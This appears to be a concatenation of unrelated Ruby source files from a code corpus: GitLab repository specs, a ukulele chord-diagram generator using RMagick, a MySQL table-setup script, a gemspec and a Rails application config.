it 'returns nil' do
expect(repository.tree(:head)).to be_nil
end
it 'returns nil when using a path' do
expect(repository.tree(:head, 'README.md')).to be_nil
end
end
context 'using an existing repository' do
it 'returns a Tree' do
expect(repository.tree(:head)).to be_an_instance_of(Tree)
expect(repository.tree('v1.1.1')).to be_an_instance_of(Tree)
end
end
end
it_behaves_like '#tree'
describe '#tree with Rugged enabled', :enable_rugged do
it_behaves_like '#tree'
end
describe '#size' do
context 'with a non-existing repository' do
it 'returns 0' do
expect(repository).to receive(:exists?).and_return(false)
expect(repository.size).to eq(0.0)
end
end
context 'with an existing repository' do
it 'returns the repository size as a Float' do
expect(repository.size).to be_an_instance_of(Float)
end
end
end
describe '#local_branches' do
it 'returns the local branches' do
masterrev = repository.find_branch('master').dereferenced_target
create_remote_branch('joe', 'remote_branch', masterrev)
repository.add_branch(user, 'local_branch', masterrev.id)
expect(repository.local_branches.any? { |branch| branch.name == 'remote_branch' }).to eq(false)
expect(repository.local_branches.any? { |branch| branch.name == 'local_branch' }).to eq(true)
end
end
describe '#commit_count' do
context 'with a non-existing repository' do
it 'returns 0' do
expect(repository).to receive(:root_ref).and_return(nil)
expect(repository.commit_count).to eq(0)
end
end
context 'with an existing repository' do
it 'returns the commit count' do
expect(repository.commit_count).to be_an(Integer)
end
end
end
describe '#commit_count_for_ref' do
let(:project) { create(:project) }
context 'with a non-existing repository' do
it 'returns 0' do
expect(project.repository.commit_count_for_ref('master')).to eq(0)
end
end
context 'with empty repository' do
it 'returns 0' do
project.create_repository
expect(project.repository.commit_count_for_ref('master')).to eq(0)
end
end
context 'when searching for the root ref' do
it 'returns the same count as #commit_count' do
expect(repository.commit_count_for_ref(repository.root_ref)).to eq(repository.commit_count)
end
end
end
describe '#refresh_method_caches' do
it 'refreshes the caches of the given types' do
expect(repository).to receive(:expire_method_caches)
.with(%i(rendered_readme readme_path license_blob license_key license))
expect(repository).to receive(:rendered_readme)
expect(repository).to receive(:readme_path)
expect(repository).to receive(:license_blob)
expect(repository).to receive(:license_key)
expect(repository).to receive(:license)
repository.refresh_method_caches(%i(readme license))
end
end
describe '#gitlab_ci_yml_for' do
before do
repository.create_file(User.last, '.gitlab-ci.yml', 'CONTENT', message: 'Add .gitlab-ci.yml', branch_name: 'master')
end
context 'when there is a .gitlab-ci.yml at the commit' do
it 'returns the content' do
expect(repository.gitlab_ci_yml_for(repository.commit.sha)).to eq('CONTENT')
end
end
context 'when there is no .gitlab-ci.yml at the commit' do
it 'returns nil' do
expect(repository.gitlab_ci_yml_for(repository.commit.parent.sha)).to be_nil
end
end
end
describe '#route_map_for' do
before do
repository.create_file(User.last, '.gitlab/route-map.yml', 'CONTENT', message: 'Add .gitlab/route-map.yml', branch_name: 'master')
end
context 'when there is a .gitlab/route-map.yml at the commit' do
it 'returns the content' do
expect(repository.route_map_for(repository.commit.sha)).to eq('CONTENT')
end
end
context 'when there is no .gitlab/route-map.yml at the commit' do
it 'returns nil' do
expect(repository.route_map_for(repository.commit.parent.sha)).to be_nil
end
end
end
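# Writes a remote-tracking ref directly through Rugged, bypassing the
# Repository API, to simulate a branch fetched from a remote.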
def create_remote_branch(remote_name, branch_name, target)
rugged = rugged_repo(repository)
rugged.references.create("refs/remotes/#{remote_name}/#{branch_name}", target.id)
end
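# Shared between the Gitaly- and Rugged-backed describes below; BLANK_SHA
# stands in for an invalid commit ID.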
shared_examples '#ancestor?' do
let(:commit) { repository.commit }
let(:ancestor) { commit.parents.first }
it 'is an ancestor' do
expect(repository.ancestor?(ancestor.id, commit.id)).to eq(true)
end
it 'is not an ancestor' do
expect(repository.ancestor?(commit.id, ancestor.id)).to eq(false)
end
it 'returns false on nil-values' do
expect(repository.ancestor?(nil, commit.id)).to eq(false)
expect(repository.ancestor?(ancestor.id, nil)).to eq(false)
expect(repository.ancestor?(nil, nil)).to eq(false)
end
it 'returns false for invalid commit IDs' do
expect(repository.ancestor?(commit.id, Gitlab::Git::BLANK_SHA)).to eq(false)
expect(repository.ancestor?(Gitlab::Git::BLANK_SHA, commit.id)).to eq(false)
end
end
describe '#ancestor? with Gitaly enabled' do
let(:commit) { repository.commit }
let(:ancestor) { commit.parents.first }
let(:cache_key) { "ancestor:#{ancestor.id}:#{commit.id}" }
it_behaves_like '#ancestor?'
context 'caching', :request_store, :clean_gitlab_redis_cache do
it 'only calls out to Gitaly once' do
expect(repository.raw_repository).to receive(:ancestor?).once
2.times { repository.ancestor?(commit.id, ancestor.id) }
end
it 'returns the value from the request store' do
repository.__send__(:request_store_cache).write(cache_key, "it's apparent")
expect(repository.ancestor?(ancestor.id, commit.id)).to eq("it's apparent")
end
it 'returns the value from the redis cache' do
expect(repository.__send__(:cache)).to receive(:fetch).with(cache_key).and_return("it's apparent")
expect(repository.ancestor?(ancestor.id, commit.id)).to eq("it's apparent")
end
end
end
describe '#ancestor? with Rugged enabled', :enable_rugged do
it 'calls out to the Rugged implementation' do
allow_any_instance_of(Rugged::Repository).to receive(:merge_base).with(repository.commit.id, Gitlab::Git::BLANK_SHA).and_call_original
repository.ancestor?(repository.commit.id, Gitlab::Git::BLANK_SHA)
end
it_behaves_like '#ancestor?'
end
describe '#archive_metadata' do
let(:ref) { 'master' }
let(:storage_path) { '/tmp' }
let(:prefix) { [project.path, ref].join('-') }
let(:filename) { prefix + '.tar.gz' }
subject(:result) { repository.archive_metadata(ref, storage_path, append_sha: false) }
context 'with hashed storage disabled' do
let(:project) { create(:project, :repository, :legacy_storage) }
it 'uses the project path to generate the filename' do
expect(result['ArchivePrefix']).to eq(prefix)
expect(File.basename(result['ArchivePath'])).to eq(filename)
end
end
context 'with hashed storage enabled' do
it 'uses the project path to generate the filename' do
expect(result['ArchivePrefix']).to eq(prefix)
expect(File.basename(result['ArchivePath'])).to eq(filename)
end
end
end
describe 'commit cache' do
let_it_be(:project) { create(:project, :repository) }
it 'caches based on SHA' do
# Gets the commit oid, and warms the cache
oid = project.commit.id
expect(Gitlab::Git::Commit).to receive(:find).once
2.times { project.commit_by(oid: oid) }
end
it 'caches nil values' do
expect(Gitlab::Git::Commit).to receive(:find).once
2.times { project.commit_by(oid: '1' * 40) }
end
end
describe '#raw_repository' do
subject { repository.raw_repository }
it 'returns a Gitlab::Git::Repository representation of the repository' do
expect(subject).to be_a(Gitlab::Git::Repository)
expect(subject.relative_path).to eq(project.disk_path + '.git')
expect(subject.gl_repository).to eq("project-#{project.id}")
expect(subject.gl_project_path).to eq(project.full_path)
end
context 'with a wiki repository' do
let(:repository) { project.wiki.repository }
it 'creates a Gitlab::Git::Repository with the proper attributes' do
expect(subject).to be_a(Gitlab::Git::Repository)
expect(subject.relative_path).to eq(project.disk_path + '.wiki.git')
expect(subject.gl_repository).to eq("wiki-#{project.id}")
expect(subject.gl_project_path).to eq(project.full_path)
end
end
end
describe '#contributors' do
let(:author_a) { build(:author, email: '[email protected]', name: 'tiagonbotelho') }
let(:author_b) { build(:author, email: '[email protected]', name: 'Winnie') }
let(:author_c) { build(:author, email: '[email protected]', name: 'Douwe Maan') }
let(:stubbed_commits) do
[build(:commit, author: author_a),
build(:commit, author: author_a),
build(:commit, author: author_b),
build(:commit, author: author_c),
build(:commit, author: author_c),
build(:commit, author: author_c)]
end
let(:order_by) { nil }
let(:sort) { nil }
before do
allow(repository).to receive(:commits).with(nil, limit: 2000, offset: 0, skip_merges: true).and_return(stubbed_commits)
end
subject { repository.contributors(order_by: order_by, sort: sort) }
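# Asserts contributor ordering by email, since each stubbed author above has
# a unique email address.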
def expect_contributors(*contributors)
expect(subject.map(&:email)).to eq(contributors.map(&:email))
end
it 'returns the array of Gitlab::Contributor for the repository' do
expect_contributors(author_a, author_b, author_c)
end
context 'order_by email' do
let(:order_by) { 'email' }
context 'asc' do
let(:sort) { 'asc' }
it 'returns all the contributors ordered by email asc case insensitive' do
expect_contributors(author_c, author_b, author_a)
end
end
context 'desc' do
let(:sort) { 'desc' }
it 'returns all the contributors ordered by email desc case insensitive' do
expect_contributors(author_a, author_b, author_c)
end
end
end
context 'order_by name' do
let(:order_by) { 'name' }
context 'asc' do
let(:sort) { 'asc' }
it 'returns all the contributors ordered by name asc case insensitive' do
expect_contributors(author_c, author_a, author_b)
end
end
context 'desc' do
let(:sort) { 'desc' }
it 'returns all the contributors ordered by name desc case insensitive' do
expect_contributors(author_b, author_a, author_c)
end
end
end
context 'order_by commits' do
let(:order_by) { 'commits' }
context 'asc' do
let(:sort) { 'asc' }
it 'returns all the contributors ordered by commits asc' do
expect_contributors(author_b, author_a, author_c)
end
end
context 'desc' do
let(:sort) { 'desc' }
it 'returns all the contributors ordered by commits desc' do
expect_contributors(author_c, author_a, author_b)
end
end
end
context 'invalid ordering' do
let(:order_by) { 'unknown' }
it 'returns the contributors unsorted' do
expect_contributors(author_a, author_b, author_c)
end
end
context 'invalid sorting' do
let(:order_by) { 'name' }
let(:sort) { 'unknown' }
it 'returns the contributors unsorted' do
expect_contributors(author_a, author_b, author_c)
end
end
end
describe '#merge_base' do
let_it_be(:project) { create(:project, :repository) }
subject(:repository) { project.repository }
it 'only makes one gitaly call' do
expect(Gitlab::GitalyClient).to receive(:call).once.and_call_original
repository.merge_base('master', 'fix')
end
end
describe '#create_if_not_exists' do
let(:project) { create(:project) }
let(:repository) { project.repository }
it 'creates the repository if it did not exist' do
expect { repository.create_if_not_exists }.to change { repository.exists? }.from(false).to(true)
end
it 'returns true' do
expect(repository.create_if_not_exists).to eq(true)
end
it 'calls out to the repository client to create a repo' do
expect(repository.raw.gitaly_repository_client).to receive(:create_repository)
repository.create_if_not_exists
end
context 'it does nothing if the repository already existed' do
let(:project) { create(:project, :repository) }
it 'does nothing if the repository already existed' do
expect(repository.raw.gitaly_repository_client).not_to receive(:create_repository)
repository.create_if_not_exists
end
it 'returns nil' do
expect(repository.create_if_not_exists).to be_nil
end
end
context 'when the repository exists but the cache is not up to date' do
let(:project) { create(:project, :repository) }
it 'does not raise errors' do
allow(repository).to receive(:exists?).and_return(false)
expect(repository.raw).to receive(:create_repository).and_call_original
expect { repository.create_if_not_exists }.not_to raise_error
end
it 'returns nil' do
expect(repository.create_if_not_exists).to be_nil
end
end
end
describe '#create_from_bundle' do
let(:project) { create(:project) }
let(:repository) { project.repository }
let(:valid_bundle_path) { File.join(Dir.tmpdir, "repo-#{SecureRandom.hex}.bundle") }
let(:raw_repository) { repository.raw }
before do
allow(raw_repository).to receive(:create_from_bundle).and_return({})
end
after do
FileUtils.rm_rf(valid_bundle_path)
end
it 'calls out to the raw_repository to create a repo from bundle' do
expect(raw_repository).to receive(:create_from_bundle)
repository.create_from_bundle(valid_bundle_path)
end
it 'calls after_create' do
expect(repository).to receive(:after_create)
repository.create_from_bundle(valid_bundle_path)
end
context 'when exception is raised' do
before do
allow(raw_repository).to receive(:create_from_bundle).and_raise(::Gitlab::Git::BundleFile::InvalidBundleError)
end
it 'after_create is not executed' do
expect(repository).not_to receive(:after_create)
expect { repository.create_from_bundle(valid_bundle_path) }.to raise_error(::Gitlab::Git::BundleFile::InvalidBundleError)
end
end
end
describe "#blobs_metadata" do
let_it_be(:project) { create(:project, :repository) }
let(:repository) { project.repository }
def expect_metadata_blob(thing)
expect(thing).to be_a(Blob)
expect(thing.data).to be_empty
end
it "returns blob metadata in batch for HEAD" do
result = repository.blobs_metadata(["bar/branch-test.txt", "README.md", "does/not/exist"])
expect_metadata_blob(result.first)
expect_metadata_blob(result.second)
expect(result.size).to eq(2)
end
it "returns blob metadata for a specified ref" do
result = repository.blobs_metadata(["files/ruby/feature.rb"], "feature")
expect_metadata_blob(result.first)
end
it "performs a single gitaly call", :request_store do
expect { repository.blobs_metadata(["bar/branch-test.txt", "readme.txt", "does/not/exist"]) }
.to change { Gitlab::GitalyClient.get_request_count }.by(1)
end
end
describe '#submodule_links' do
it 'returns an instance of Gitlab::SubmoduleLinks' do
expect(repository.submodule_links).to be_a(Gitlab::SubmoduleLinks)
end
end
describe '#lfs_enabled?' do
let_it_be(:project) { create(:project, :repository, lfs_enabled: true) }
subject { repository.lfs_enabled? }
context 'for a project repository' do
let(:repository) { project.repository }
it 'returns true when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_truthy
end
it 'returns false when LFS is disabled' do
stub_lfs_setting(enabled: false)
is_expected.to be_falsy
end
end
context 'for a project wiki repository' do
let(:repository) { project.wiki.repository }
it 'returns true when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_truthy
end
it 'returns false when LFS is disabled' do
stub_lfs_setting(enabled: false)
is_expected.to be_falsy
end
end
context 'for a project snippet repository' do
let(:snippet) { create(:project_snippet, project: project) }
let(:repository) { snippet.repository }
it 'returns false when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_falsy
end
end
context 'for a personal snippet repository' do
let(:snippet) { create(:personal_snippet) }
let(:repository) { snippet.repository }
it 'returns false when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_falsy
end
end
end
end
| 30.817223 | 150 | 0.662738 |
911549425b6793c8e833fc93389b31582989ee38 | 9,286 | require 'rubygems'
require 'RMagick'
# This script draws ukulele chords for use in
# tabs or elsewhere
#
# Author:: Tom MacWright (mailto:[email protected])
# Copyright:: Copyright (c) 2008 Tom MacWright
# License:: BSD License
CHORD_LIST = {
'C' => [3, 0, 0, 0],
'Cm' => [3, 3, 3, 0],
'C7' => [1, 0, 0, 0],
'CM7' => [2, 0, 0, 0],
'Cm7' => [3, 3, 3, 3],
'Cdim' => [3, 2, 3, 2],
'Cm7(b5)' => [3, 2, 3, 3],
'Caug' => [3, 0, 0, 1],
'Csus4' => [3, 3, 5, 5],
'C6' => [0, 0, 0, 0],
'C7(9)' => [1, 0, 2, 0],
'CM7(9)' => [2, 0, 2, 0],
'CmM7' => [3, 3, 3, 4],
'Cadd9' => [3, 0, 2, 0],
'C#' => [4, 1, 1, 1],
'C#m' => [4, 4, 4, 1],
'C#7' => [2, 1, 1, 1],
'C#M7' => [3, 1, 1, 1],
'C#m7' => [2, 0, 1, 1],
'C#dim' => [1, 0, 1, 0],
'C#m7(b5)' => [3, 2, 3, 3],
'C#aug' => [0, 1, 1, 2],
'C#sus4' => [2, 2, 1, 1],
'C#6' => [1, 1, 1, 1],
'C#7(9)' => [2, 1, 3, 1],
'C#M7(9)' => [3, 1, 3, 1],
'C#mM7' => [3, 0, 1, 1],
'C#add9' => [4, 1, 3, 1],
'Db' => [4, 1, 1, 1],
'Dbm' => [4, 4, 4, 1],
'Db7' => [2, 1, 1, 1],
'DbM7' => [3, 1, 1, 1],
'Dbm7' => [2, 0, 1, 1],
'Dbdim' => [1, 0, 1, 0],
'Dbm7(b5)' => [3, 2, 3, 3],
'Dbaug' => [0, 1, 1, 2],
'Dbsus4' => [2, 2, 1, 1],
'Db6' => [1, 1, 1, 1],
'Db7(9)' => [2, 1, 3, 1],
'DbM7(9)' => [3, 1, 3, 1],
'DbmM7' => [3, 0, 1, 1],
'Dbadd9' => [4, 1, 3, 1],
'D' => [0, 2, 2, 2],
'Dm' => [0, 1, 2, 2],
'D7' => [3, 2, 2, 2],
'DM7' => [4, 2, 2, 2],
'Dm7' => [3, 1, 2, 2],
'Ddim' => [2, 1, 2, 1],
'Dm7(b5)' => [3, 1, 2, 1],
'Daug' => [1, 2, 2, 3],
'Dsus4' => [0, 3, 2, 2],
'D6' => [2, 2, 2, 2],
'D7(9)' => [3, 2, 4, 2],
'DM7(9)' => [4, 2, 4, 2],
'DmM7' => [4, 1, 2, 2],
'Dadd9' => [5, 2, 4, 2],
'D#' => [1, 3, 3, 0],
'D#m' => [1, 2, 3, 3],
'D#7' => [4, 3, 3, 3],
'D#M7' => [5, 3, 3, 3],
'D#m7' => [4, 2, 3, 3],
'D#dim' => [3, 2, 3, 2],
'D#m7(b5)' => [4, 2, 3, 2],
'D#aug' => [2, 3, 3, 0],
'D#sus4' => [1, 4, 3, 3],
'D#6' => [4, 4, 4, 4],
'D#7(9)' => [1, 1, 1, 0],
'D#M7(9)' => [1, 1, 2, 0],
'D#mM7' => [5, 2, 3, 3],
'D#add9' => [1, 1, 3, 0],
'Eb' => [1, 3, 3, 0],
'Ebm' => [1, 2, 3, 3],
'Eb7' => [4, 3, 3, 3],
'EbM7' => [5, 3, 3, 3],
'Ebm7' => [4, 2, 3, 3],
'Ebdim' => [3, 2, 3, 2],
'Ebm7(b5)' => [4, 2, 3, 2],
'Ebaug' => [2, 3, 3, 0],
'Ebsus4' => [1, 4, 3, 3],
'Eb6' => [4, 4, 4, 4],
'Eb7(9)' => [1, 1, 1, 0],
'EbM7(9)' => [1, 1, 2, 0],
'EbmM7' => [5, 2, 3, 3],
'Ebadd9' => [1, 1, 3, 0],
'E' => [2, 4, 4, 4],
'Em' => [2, 3, 4, 0],
'E7' => [2, 0, 2, 1],
'EM7' => [2, 0, 3, 1],
'Em7' => [2, 0, 2, 0],
'Edim' => [1, 0, 1, 0],
'Em7(b5)' => [1, 0, 2, 0],
'Eaug' => [3, 0, 0, 1],
'Esus4' => [2, 5, 4, 4],
'E6' => [2, 0, 1, 1],
'E7(9)' => [2, 2, 2, 1],
'EM7(9)' => [2, 2, 3, 1],
'EmM7' => [2, 0, 3, 0],
'Eadd9' => [2, 2, 4, 1],
'F' => [0, 1, 0, 2],
'Fm' => [3, 1, 0, 1],
'F7' => [3, 1, 3, 2],
'FM7' => [0, 0, 5, 5],
'Fm7' => [3, 1, 3, 1],
'Fdim' => [2, 1, 2, 1],
'Fm7(b5)' => [2, 1, 3, 1],
'Faug' => [0, 1, 1, 2],
'Fsus4' => [1, 1, 0, 3],
'F6' => [3, 1, 2, 2],
'F7(9)' => [3, 3, 3, 2],
'FM7(9)' => [0, 0, 0, 0],
'FmM7' => [3, 1, 4, 1],
'Fadd9' => [0, 1, 0, 0],
'F#' => [1, 2, 1, 3],
'F#m' => [0, 2, 1, 2],
'F#7' => [4, 2, 4, 3],
'F#M7' => [4, 2, 5, 3],
'F#m7' => [4, 2, 4, 2],
'F#dim' => [3, 2, 3, 2],
'F#m7(b5)' => [3, 2, 4, 2],
'F#aug' => [1, 2, 2, 3],
'F#sus4' => [4, 2, 4, 4],
'F#6' => [4, 2, 3, 3],
'F#7(9)' => [4, 4, 4, 3],
'F#M7(9)' => [1, 1, 1, 1],
'F#mM7' => [4, 2, 5, 2],
'F#add9' => [1, 2, 1, 1],
'Gb' => [1, 2, 1, 3],
'Gbm' => [0, 2, 1, 2],
'Gb7' => [4, 2, 4, 3],
'GbM7' => [4, 2, 5, 3],
'Gbm7' => [4, 2, 4, 2],
'Gbdim' => [3, 2, 3, 2],
'Gbm7(b5)' => [3, 2, 4, 2],
'Gbaug' => [1, 2, 2, 3],
'Gbsus4' => [4, 2, 4, 4],
'Gb6' => [4, 2, 3, 3],
'Gb7(9)' => [4, 4, 4, 3],
'GbM7(9)' => [1, 1, 1, 1],
'GbmM7' => [4, 2, 5, 2],
'Gbadd9' => [1, 2, 1, 1],
'G' => [2, 3, 2, 0],
'Gm' => [1, 3, 2, 0],
'G7' => [2, 1, 2, 0],
'GM7' => [2, 2, 2, 0],
'Gm7' => [1, 1, 2, 0],
'Gdim' => [1, 0, 1, 0],
'Gm7(b5)' => [1, 1, 1, 0],
'Gaug' => [2, 3, 3, 0],
'Gsus4' => [3, 3, 2, 0],
'G6' => [2, 0, 2, 0],
'G7(9)' => [2, 1, 2, 2],
'GM7(9)' => [2, 2, 2, 2],
'GmM7' => [5, 3, 6, 3],
'Gadd9' => [2, 3, 2, 2],
'G#' => [3, 4, 3, 5],
'G#m' => [2, 4, 3, 1],
'G#7' => [3, 2, 3, 1],
'G#M7' => [3, 3, 3, 1],
'G#m7' => [2, 2, 3, 1],
'G#dim' => [2, 1, 2, 1],
'G#m7(b5)' => [2, 2, 2, 1],
'G#aug' => [3, 0, 0, 1],
'G#sus4' => [4, 4, 3, 1],
'G#6' => [3, 1, 3, 1],
'G#7(9)' => [3, 2, 3, 3],
'G#M7(9)' => [3, 3, 3, 3],
'G#mM7' => [6, 4, 7, 4],
'G#add9' => [3, 4, 3, 3],
'Ab' => [3, 4, 3, 5],
'Abm' => [2, 4, 3, 1],
'Ab7' => [3, 2, 3, 1],
'AbM7' => [3, 3, 3, 1],
'Abm7' => [2, 2, 3, 1],
'Abdim' => [2, 1, 2, 1],
'Abm7(b5)' => [2, 2, 2, 1],
'Abaug' => [3, 0, 0, 1],
'Absus4' => [4, 4, 3, 1],
'Ab6' => [3, 1, 3, 1],
'Ab7(9)' => [3, 2, 3, 3],
'AbM7(9)' => [3, 3, 3, 3],
'AbmM7' => [6, 4, 7, 4],
'Abadd9' => [3, 4, 3, 3],
'A' => [0, 0, 1, 2],
'Am' => [0, 0, 0, 2],
'A7' => [0, 0, 1, 0],
'AM7' => [0, 0, 1, 1],
'Am7' => [0, 0, 0, 0],
'Adim' => [3, 2, 3, 2],
'Am7(b5)' => [3, 3, 3, 2],
'Aaug' => [0, 1, 1, 2],
'Asus4' => [0, 0, 2, 2],
'A6' => [4, 2, 4, 2],
'A7(9)' => [2, 3, 1, 2],
'AM7(9)' => [2, 4, 1, 2],
'AmM7' => [0, 0, 0, 1],
'Aadd9' => [2, 0, 1, 2],
'A#' => [1, 1, 2, 3],
'A#m' => [1, 1, 1, 3],
'A#7' => [1, 1, 2, 1],
'A#M7' => [0, 1, 2, 3],
'A#m7' => [1, 1, 1, 1],
'A#dim' => [1, 0, 1, 0],
'A#m7(b5)' => [1, 0, 1, 1],
'A#aug' => [1, 2, 2, 3],
'A#sus4' => [1, 1, 3, 3],
'A#6' => [1, 1, 2, 0],
'A#7(9)' => [3, 4, 2, 3],
'A#M7(9)' => [5, 5, 5, 5],
'A#mM7' => [1, 1, 1, 2],
'A#add9' => [3, 1, 2, 3],
'Bb' => [1, 1, 2, 3],
'Bbm' => [1, 1, 1, 3],
'Bb7' => [1, 1, 2, 1],
'BbM7' => [0, 1, 2, 3],
'Bbm7' => [1, 1, 1, 1],
'Bbdim' => [1, 0, 1, 0],
'Bbm7(b5)' => [1, 0, 1, 1],
'Bbaug' => [1, 2, 2, 3],
'Bbsus4' => [1, 1, 3, 3],
'Bb6' => [1, 1, 2, 0],
'Bb7(9)' => [3, 4, 2, 3],
'BbM7(9)' => [5, 5, 5, 5],
'BbmM7' => [1, 1, 1, 2],
'Bbadd9' => [3, 1, 2, 3],
'B' => [2, 2, 3, 4],
'Bm' => [2, 2, 2, 4],
'B7' => [2, 2, 3, 2],
'BM7' => [1, 2, 3, 4],
'Bm7' => [2, 2, 2, 2],
'Bdim' => [2, 1, 2, 1],
'Bm7(b5)' => [2, 1, 2, 2],
'Baug' => [2, 3, 3, 4],
'Bsus4' => [2, 2, 4, 4],
'B6' => [2, 2, 3, 1],
'B7(9)' => [4, 2, 3, 2],
'BM7(9)' => [4, 1, 3, 3],
'BmM7' => [2, 2, 2, 3],
'Badd9' => [4, 2, 3, 4],
}
NOTES = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
STRINGS = ['G', 'C', 'E', 'A']
def draw_chord(chord_name)
  # chord_name.gsub!("x", "#")
  # Skip rendering if the image already exists; uses the same relative
  # path that generate() writes to, instead of a hard-coded home directory.
  if not FileTest.exist? "static/chords/" + chord_name + ".png"
    chord(chord_name)
  end
end
def chord(chord_name)
  return generate(chord_name, get_frets(chord_name.gsub("x", "#")))
end

def get_frets(chord_name)
  if CHORD_LIST.has_key? chord_name then
    return CHORD_LIST[chord_name].reverse
  else
    chord_name.sub!("maj", "M")
    if CHORD_LIST.has_key? chord_name then
      return CHORD_LIST[chord_name].reverse
    end
  end
end
def generate(chord, frets)
  # Frets are 10px high
  # The strings are 12px apart
  height = (frets.max * 10) + 60
  width = ((STRINGS.length - 1) * 12) + 16
  last_fret = 15 + ((frets.max + 1) * 10)
last_string = 5 + ((STRINGS.length - 1) * 12)
canvas = Magick::Image.new(width, height)
gc = Magick::Draw.new
gc.stroke('gray25')
(0..(STRINGS.length - 1)).each do |string|
gc.line(5 + 12 * string, 15, 5 + 12 * string, last_fret)
end
  (0..(frets.max + 1)).each do |fret|
if fret == 0
gc.stroke_width(3)
else
gc.stroke_width(1)
end
gc.line(5, 15 + 10 * fret, last_string, 15 + 10 * fret)
end
gc.stroke('transparent')
i = 0
  frets.each { |f|
if f > 0 then
gc.circle(
5 + 12 * i,
15 + 10 * f,
8 + 12 * i,
18 + 10 * f
)
end
a = NOTES.index(STRINGS[i]) + f
n = a % NOTES.length
gc.font_family = "arial"
gc.pointsize = 6
gc.text(1 + 13 * i, last_fret + 14, NOTES[n])
i = i + 1
}
gc.font_weight = 100
gc.pointsize = 11
gc.text(0, 10, chord.gsub("x", "#"))
gc.draw(canvas)
canvas.write('static/chords/'+chord+".png")
end
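# Example usage (illustrative; assumes RMagick is installed and the
# static/chords/ directory is writable):
#   draw_chord("C")   # writes static/chords/C.png unless it already exists
#   chord("F#m")      # always regenerates static/chords/F#m.png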
| 28.660494 | 77 | 0.326513 |
387984d89a3ef103e948576ebfd0c6849794820c | 2,203 | #!/usr/bin/env ruby
# require './lib/db.rb'
require "inifile"
require 'dbi'
class IniLoad
def initialize
@ini = IniFile.load("./sclman.conf")
end
def search( section, name )
val = @ini[section][name]
return "#{val}"
end
end
ini = IniLoad.new
dbname = ini.search("DB", "dbname")
dbuser = ini.search("DB", "dbuser")
dbpass = ini.search("DB", "dbpass")
module ConnectDb
def self.connect()
ini = IniLoad.new
dbname = ini.search("DB", "dbname")
dbuser = ini.search("DB", "dbuser")
dbpass = ini.search("DB", "dbpass")
dbconn = DBI.connect("DBI:Mysql:#{dbname}:localhost", "#{dbuser}", "#{dbpass}")
begin
result = yield dbconn
    rescue DBI::DatabaseError => e
puts "An error occurred"
puts "Error code: #{e.err}"
puts "Error message: #{e.errstr}"
ensure
dbconn.disconnect if dbconn
end
  rescue Errno::ECONNREFUSED
    # Silently ignore a refused connection (e.g. MySQL is not running yet).
end
end
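# Usage sketch (illustrative): run a query on a managed connection.
#   ConnectDb.connect { |dbh| dbh.select_all("SELECT * FROM lbmembers") }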
def create_table(tablename)
if tablename == "lbmembers" then
ConnectDb.connect() do |sock|
sock.do("CREATE TABLE #{tablename} (
id INT UNSIGNED NOT NULL AUTO_INCREMENT,
instancename CHAR(20) NOT NULL,
ipaddr CHAR(20) NOT NULL,
groupname CHAR(20) NOT NULL,
created_date CHAR(20) NOT NULL,
updated_date CHAR(20) NOT NULL,
PRIMARY KEY (id))")
end
elsif tablename == "counter" then
ConnectDb.connect() do |sock|
sock.do("CREATE TABLE #{tablename} (
id INT UNSIGNED NOT NULL AUTO_INCREMENT,
groupname CHAR(20) NOT NULL,
count INT NOT NULL,
basic_count INT NOT NULL,
created_date CHAR(20) NOT NULL,
updated_date CHAR(20) NOT NULL,
PRIMARY KEY (id))")
end
else
puts "error was occoured. table name should be 'lbmembers' or 'counter'."
end
end
puts "input mysql root password twice."
system("mysql -u root -p -e \"CREATE DATABASE #{dbname};\"")
system("mysql -u root -p -e \"GRANT ALL ON #{dbname}.* TO #{dbuser}@localhost IDENTIFIED BY \'#{dbpass}\';\"")
create_table("lbmembers")
create_table("counter")
| 28.24359 | 110 | 0.589197 |
01045b14a9e1191dccf791b043245cc34be84f8b | 713 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "record_revision/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "record_revision"
s.version = RecordRevision::VERSION
s.authors = ["ponpocopocopon"]
s.email = [""]
s.homepage = ""
  s.summary     = "Records difference information for model data."
  s.description = "This plugin automatically records difference information to a database table."
s.files = Dir["{app,config,db,lib}/**/*", "MIT-LICENSE", "Rakefile", "README.rdoc"]
s.test_files = Dir["test/**/*"]
#s.add_dependency "rails", "~> 4.0.0"
#s.add_development_dependency "sqlite3"
end
| 32.409091 | 98 | 0.667602 |
08fbd379616625bbe5958bc020376e7097a67718 | 3,459 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
#Bundler.require(*Rails.groups)
Bundler.require(:default, Rails.env)
# IMS-LTI
OAUTH_10_SUPPORT = true
require 'oauth/request_proxy/action_dispatch_request'
module SistemaTcc
class Application < Rails::Application
#config.active_record.raise_in_transactional_callbacks = true
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
config.autoload_paths += %W(#{config.root}/lib)
config.autoload_paths += %W(#{config.root}/lib/modules)
config.autoload_paths += %W(#{config.root}/app/models/ckeditor)
config.autoload_paths += %W(#{config.root}/app/models/concerns)
config.autoload_paths += %W(#{config.root}/app/controllers/concerns)
config.autoload_paths += %W(#{config.root}/app/validations)
# config.autoload_paths += %W(#{config.root}/lib/workers)
# config.eager_load_paths += ["#{config.root}/lib/workers"]
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
config.i18n.available_locales = [:en, :"pt-BR"]
config.i18n.enforce_available_locales = false
# config.i18n.enforce_available_locales = true
config.i18n.load_path += Dir[Rails.root.join('config', 'locales', '*.{rb,yml}').to_s]
config.i18n.default_locale = :'pt-BR'
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Enable escaping HTML in JSON.
